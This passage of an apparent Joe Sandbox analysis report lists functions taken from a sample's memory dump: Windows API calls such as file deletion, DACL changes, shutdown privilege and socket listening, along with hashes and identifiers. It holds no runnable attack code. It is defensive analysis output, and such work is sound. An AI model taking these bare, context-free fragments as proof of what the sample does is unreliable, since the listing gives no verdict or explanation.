                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                        • Opcode ID: b3748baf22ab682651f74481cc98c4081abfb795cbab352a31269855a318eda2
                                                                                                                        • Instruction ID: 40284b1368383c1008cdbac3f86769cd0a4c8e6d121dece28cea652ca3f261bf
                                                                                                                        • Opcode Fuzzy Hash: b3748baf22ab682651f74481cc98c4081abfb795cbab352a31269855a318eda2
                                                                                                                        • Instruction Fuzzy Hash: D3311432905359BECF10EFA5EC49EEE33AC9F45320F144155EA14F2090DB30DA88CA79
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_memset
                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                        • Opcode ID: 1519374931def30d64bcd9dac016698495934b220cfbfd81bbb21530ba99ee36
                                                                                                                        • Instruction ID: 00ff62d918f8ac293b7f936ed27170654ce1d5caf26c685eb74f16262cdfe5c5
                                                                                                                        • Opcode Fuzzy Hash: 1519374931def30d64bcd9dac016698495934b220cfbfd81bbb21530ba99ee36
                                                                                                                        • Instruction Fuzzy Hash: 58728C71E042199BDF24CF98C8906EDBBB1FF49314F2881A9D855BB281D774EE81DB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DFED0C
                                                                                                                        • GetFocus.USER32 ref: 00DFED1C
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00DFED27
                                                                                                                        • _memset.LIBCMT ref: 00DFEE52
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00DFEE7D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00DFEE9D
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00DFEEB0
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DFEEE4
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DFEF2C
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DFEF64
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00DFEF99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3616455698-4108050209
                                                                                                                        • Opcode ID: 62df0cf7853f372cda2fa909214b5de8ee3f274151cad5827166015fbbc9bb4b
                                                                                                                        • Instruction ID: c0f621f003beadd009a8b7ed7f02067303fd0a214bf1d5a8596f7c54c8a9f3c2
                                                                                                                        • Opcode Fuzzy Hash: 62df0cf7853f372cda2fa909214b5de8ee3f274151cad5827166015fbbc9bb4b
                                                                                                                        • Instruction Fuzzy Hash: F6818A71108309AFDB14CF15D884ABABBE5FF88354F05892DFA95972A1D730D905CBB2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
                                                                                                                          • Part of subcall function 00DCB8E7: GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
                                                                                                                          • Part of subcall function 00DCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
                                                                                                                          • Part of subcall function 00DCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
                                                                                                                          • Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A
                                                                                                                          • Part of subcall function 00DCB982: GetProcessHeap.KERNEL32(00000008,00DCB3E1,00000000,00000000,?,00DCB3E1,?), ref: 00DCB98E
                                                                                                                          • Part of subcall function 00DCB982: RtlAllocateHeap.NTDLL(00000000,?,00DCB3E1), ref: 00DCB995
                                                                                                                          • Part of subcall function 00DCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DCB3E1,?), ref: 00DCB9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DCB3FC
                                                                                                                        • _memset.LIBCMT ref: 00DCB411
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DCB430
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00DCB441
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00DCB47E
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DCB49A
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00DCB4B7
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DCB4C6
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00DCB4CD
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DCB4EE
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00DCB4F5
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DCB526
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DCB54C
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DCB560
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2347767575-0
                                                                                                                        • Opcode ID: b9c3c99eb674bd21c333b1aa67b3770d4d1ed3547981f4ba03df460a68601856
                                                                                                                        • Instruction ID: 71b10436dfa6aebff2854a191bd5afd6fc65fb4ea3e1010c2729bd9e3fda9c18
                                                                                                                        • Opcode Fuzzy Hash: b9c3c99eb674bd21c333b1aa67b3770d4d1ed3547981f4ba03df460a68601856
                                                                                                                        • Instruction Fuzzy Hash: 8A51F87190020AAFDF14DFA5DC46EEEBB79FF08324F14811AE915A7291DB35DA09CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA
                                                                                                                          • Part of subcall function 00DD7C0C: GetFileAttributesW.KERNEL32(?,00DD6A7B), ref: 00DD7C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6E7E
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DD6E99
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00DD6EAE
                                                                                                                        • _wcscpy.LIBCMT ref: 00DD6EDD
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6EEF
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6F01
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00DD6F0E
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DD6F22
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00DD6F3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                        • Opcode ID: 2e03c875558c954f0e485864a8ff3fb4c1ff9e0aab5c2cfb941eb3a83ee9ff72
                                                                                                                        • Instruction ID: 720ffce3ada4e70fcc68ff694f5ac44e91e91d9a4df815a66ed1df6a3e4b0c62
                                                                                                                        • Opcode Fuzzy Hash: 2e03c875558c954f0e485864a8ff3fb4c1ff9e0aab5c2cfb941eb3a83ee9ff72
                                                                                                                        • Instruction Fuzzy Hash: 3221BF72409384AEC610EFA49C849DBBBEC9F99214F444E5BF5E5C3152EB34D60D8BB2
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: b85b53d92028e4d55e97d663803df55d7da659b6fb5812d3ffa242fc73807184
                                                                                                                        • Instruction ID: a84aad03020b116ccfefb203a2bf7ffce1212c6a3498b5facb56e1dcf8c9d1d4
                                                                                                                        • Opcode Fuzzy Hash: b85b53d92028e4d55e97d663803df55d7da659b6fb5812d3ffa242fc73807184
                                                                                                                        • Instruction Fuzzy Hash: F621D331608210AFDB00AF66DC09BAD77A8FF04711F048015F95AAB261DB74ED009BB4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DE24F6
                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE2526
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE253A
                                                                                                                        • _wcscmp.LIBCMT ref: 00DE2555
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE25F3
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE2609
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                        • Opcode ID: 8bf4983576861484f168e22e9c4b991e027698a24f0df9fb04785f7ee3d358f3
                                                                                                                        • Instruction ID: e837521748d5eecab49099ffcc28a7c01cd1ebaf47a5f4307588199dfde3e790
                                                                                                                        • Opcode Fuzzy Hash: 8bf4983576861484f168e22e9c4b991e027698a24f0df9fb04785f7ee3d358f3
                                                                                                                        • Instruction Fuzzy Hash: 5641A07190425AAFCF11EFA5CD49AEEBBB8FF05310F24445AE815A2190E7309E44CFB0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 72cb26f8a329c041f6a1afc3ae3d5beca673344dccc10776cecd31f1f418d5b4
                                                                                                                        • Instruction ID: ccf8ce1890fc4f38e8e1c5d4ed4b01cf51575cfeebf7ed44fc903f8a663a93df
                                                                                                                        • Opcode Fuzzy Hash: 72cb26f8a329c041f6a1afc3ae3d5beca673344dccc10776cecd31f1f418d5b4
                                                                                                                        • Instruction Fuzzy Hash: 43925C75E0021A8BDF24CF68C8907EDB7B1BB54314F2455AAE85AFB280D7709DC1DBA1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 06ee512dd7c07e87009b4fb8e326423ed47a58df6e4386e82e3a10ba048cf5e3
                                                                                                                        • Instruction ID: 0dc71a2388898140fabfcaa3d0a5b8d12620ca1180edf7a6c1f009e4d39348fd
                                                                                                                        • Opcode Fuzzy Hash: 06ee512dd7c07e87009b4fb8e326423ed47a58df6e4386e82e3a10ba048cf5e3
                                                                                                                        • Instruction Fuzzy Hash: F8126970A00609DFDF04DFA5D985AAEB7F5FF49300F208569E846E7290EB35AD51CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                          • Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
                                                                                                                          • Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799
                                                                                                                        • ReleaseCapture.USER32 ref: 00DFEB1A
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00DFEBC2
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DFEBD5
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00DFECAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                        • API String ID: 973565025-2107944366
                                                                                                                        • Opcode ID: 894db3605dcb66f8c98c5a9879435d6bbae6c4871c8580e04c7900cb4a521abb
                                                                                                                        • Instruction ID: 16ff86d2c6e5e80667c53b32c48c1f94fd2df1941510e5561c957c08a42ebd82
                                                                                                                        • Opcode Fuzzy Hash: 894db3605dcb66f8c98c5a9879435d6bbae6c4871c8580e04c7900cb4a521abb
                                                                                                                        • Instruction Fuzzy Hash: 97519D70204304AFD718EF25CC56FAA7BE5FB88744F108A19F655A72E1D7709908CB72
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DCBF0F
                                                                                                                          • Part of subcall function 00DCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DCBF3C
                                                                                                                          • Part of subcall function 00DCBEC3: GetLastError.KERNEL32 ref: 00DCBF49
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00DD830C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                        • Opcode ID: 346f8c750b51a3c532ed6e90a82359dd5e850cc0ae5a13c66f5cf9fc4c5f74b1
                                                                                                                        • Instruction ID: d96700106867c284fd591796c42f66d5564b62f00b6ff1ba19bb7dd3b3071e48
                                                                                                                        • Opcode Fuzzy Hash: 346f8c750b51a3c532ed6e90a82359dd5e850cc0ae5a13c66f5cf9fc4c5f74b1
                                                                                                                        • Instruction Fuzzy Hash: 1401A271B44315ABE76A267C8C4BFBB765CEB05F80F180826F957E22D2DE60DC04A1B4
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DE9235
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE9244
                                                                                                                        • bind.WS2_32(00000000,?,00000010), ref: 00DE9260
                                                                                                                        • listen.WS2_32(00000000,00000005), ref: 00DE926F
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE9289
                                                                                                                        • closesocket.WS2_32(00000000), ref: 00DE929D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279440585-0
                                                                                                                        • Opcode ID: 5957a7d780d7525c22c1aacb4f0053fb53aaf687d220a370beb6f5af77e040f6
                                                                                                                        • Instruction ID: 5b9be16c3e0de0cfabcd23ee7de324507f98ae5a56bb139bbe06e7f21d14abcf
                                                                                                                        • Opcode Fuzzy Hash: 5957a7d780d7525c22c1aacb4f0053fb53aaf687d220a370beb6f5af77e040f6
                                                                                                                        • Instruction Fuzzy Hash: 11219A35600600AFCF10EF69CC95BAEB7A9EF44324F14815AEA56AB3D1CB70AD45CB71
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
